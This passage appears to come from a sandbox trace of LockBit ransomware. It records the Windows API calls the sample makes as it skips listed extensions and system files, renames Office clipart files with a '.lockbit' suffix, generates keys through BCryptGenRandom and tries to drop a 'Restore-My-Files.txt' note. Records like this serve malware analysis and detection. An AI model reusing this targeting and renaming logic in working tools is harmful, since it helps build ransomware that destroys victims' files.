(lpString1="ntuser.dat.log", lpString2="SO00194_.WMF") returned -1 [0174.881] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00194_.WMF") returned -1 [0174.881] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00194_.WMF") returned -1 [0174.881] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00194_.WMF") returned 1 [0174.881] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00194_.WMF") returned -1 [0174.881] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.881] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00194_.WMF") returned=".WMF" [0174.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.882] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.882] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.883] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.883] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00194_.WMF.lockbit") returned 72 [0174.883] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00194_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0174.884] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.885] malloc (_Size=0x40068) returned 0x1ff1e60 [0174.885] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10176) returned 1 [0174.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.885] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0174.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0174.886] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0174.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00194_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00194_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.895] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.895] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.896] free (_Block=0x1fa2ed8) [0174.896] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00194_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.896] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.896] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.897] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x238c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00197_.WMF", cAlternateFileName="")) returned 1 [0174.897] lstrcmpiW (lpString1=".", lpString2="SO00197_.WMF") returned -1 [0174.898] lstrcmpiW (lpString1="..", lpString2="SO00197_.WMF") returned -1 [0174.898] PathFindExtensionW (pszPath="SO00197_.WMF") returned=".WMF" [0174.898] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.898] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.899] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.899] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00197_.WMF") returned -1 [0174.899] lstrcmpiW (lpString1="ntldr", lpString2="SO00197_.WMF") returned -1 [0174.899] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00197_.WMF") returned -1 [0174.899] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00197_.WMF") returned -1 [0174.900] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00197_.WMF") returned -1 [0174.900] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00197_.WMF") returned 1 [0174.900] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00197_.WMF") returned -1 [0174.900] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.900] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00197_.WMF") returned=".WMF" [0174.900] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.900] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.900] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.901] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.901] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.901] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.901] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.901] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.901] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.901] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00197_.WMF.lockbit") returned 72 [0174.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00197_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00197_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0174.902] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.902] malloc (_Size=0x40068) returned 0x3d70450 [0174.902] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=9100) returned 1 [0174.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0174.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0174.904] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0174.909] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00197_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00197_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.909] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.909] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.919] free (_Block=0x1fa2ed8) [0174.919] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00197_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.919] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.919] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.919] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19174500, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19174500, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x15fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00199_.WMF", cAlternateFileName="")) returned 1 [0174.919] lstrcmpiW (lpString1=".", lpString2="SO00199_.WMF") returned -1 [0174.919] lstrcmpiW (lpString1="..", lpString2="SO00199_.WMF") returned -1 [0174.919] PathFindExtensionW (pszPath="SO00199_.WMF") returned=".WMF" [0174.919] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.919] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.919] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.919] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.919] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.919] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.919] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.919] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.919] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.920] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.920] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00199_.WMF") returned -1 [0174.921] lstrcmpiW (lpString1="ntldr", lpString2="SO00199_.WMF") returned -1 [0174.921] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00199_.WMF") returned -1 [0174.921] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00199_.WMF") returned -1 [0174.921] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00199_.WMF") returned -1 [0174.921] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00199_.WMF") returned 1 [0174.921] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00199_.WMF") returned -1 [0174.921] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.921] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00199_.WMF") returned=".WMF" [0174.921] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.921] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.921] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.922] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.922] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00199_.WMF.lockbit") returned 72 [0174.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00199_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00199_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0174.923] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.923] malloc (_Size=0x40068) returned 0x1ff1e60 [0174.924] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5630) returned 1 [0174.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0174.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0174.925] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0174.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00199_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00199_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.927] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.927] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.928] free (_Block=0x1fa2ed8) [0174.928] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00199_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.928] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.928] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b4eb00, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, 